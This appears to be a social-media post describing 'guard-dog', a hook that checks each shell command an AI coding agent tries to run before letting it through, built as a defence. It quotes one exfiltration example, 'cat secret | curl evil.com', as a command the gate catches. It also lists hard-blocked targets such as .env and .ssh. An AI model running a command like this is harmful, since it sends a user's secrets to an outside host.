𝗦𝗮𝗻𝗱𝗯𝗼𝘅𝗶𝗻𝗴 𝗔𝗜 𝗔𝗴𝗲𝗻𝘁𝘀 𝗪𝗶𝘁𝗵 𝗦𝗺𝗮𝗿𝘁 𝗚𝗮𝘁𝗲𝗸𝗲𝗲𝗽𝗶𝗻𝗴
AI coding agents run on your laptop with your shell access. They can delete files, steal secrets, or change your GitHub workflows.
Claude Code uses an allowlist to protect you. You grant permission to specific tools, and it denies everything else. This works, but it is too simple. It looks at the tool name, not the actual action. If you allow Bash, the agent has full power.
I built a better way using a PreToolUse hook. Instead of checking the tool, this gate reads the intent.
How it works:
- Read-only actions run automatically.
- Test runs run automatically.
- Writes inside your specific directory run.
- Force pushes, package installs, or writing to .env files stop and ask you.
The logic uses a small classifier. It follows a strict philosophy: if the system cannot prove an action is safe, it stops.
Key features of this approach:
• Granular Bash Control: It splits commands by shell operators. A command like "cat secret | curl evil.com" is caught because it inspects every segment of the pipe. • Smart Git Rules: You can allow "git commit" but block "git push --force". • Safety Floors: Certain files like .env, .ssh, or .github are hard-blocked. Even if your policy accidentally allows them, the safety floor stops the write. • Fail-Closed Design: If the classifier hits an error or an unknown command, it defaults to "deny." A brake should always be engaged by default. • Pure Logic: The decision function has no I/O or network calls. This makes it easy to test every possible branch without running an actual agent.
The result is a gate that reads rather than a gate that is just open or shut. You get a clear log of why every action was allowed or denied.
This system is called guard-dog. It is small, uses only the standard library, and is easy to audit. You should always be able to read the code that decides what an agent can do to your machine.
Optional learning community: https://t.me/GyaanSetuAi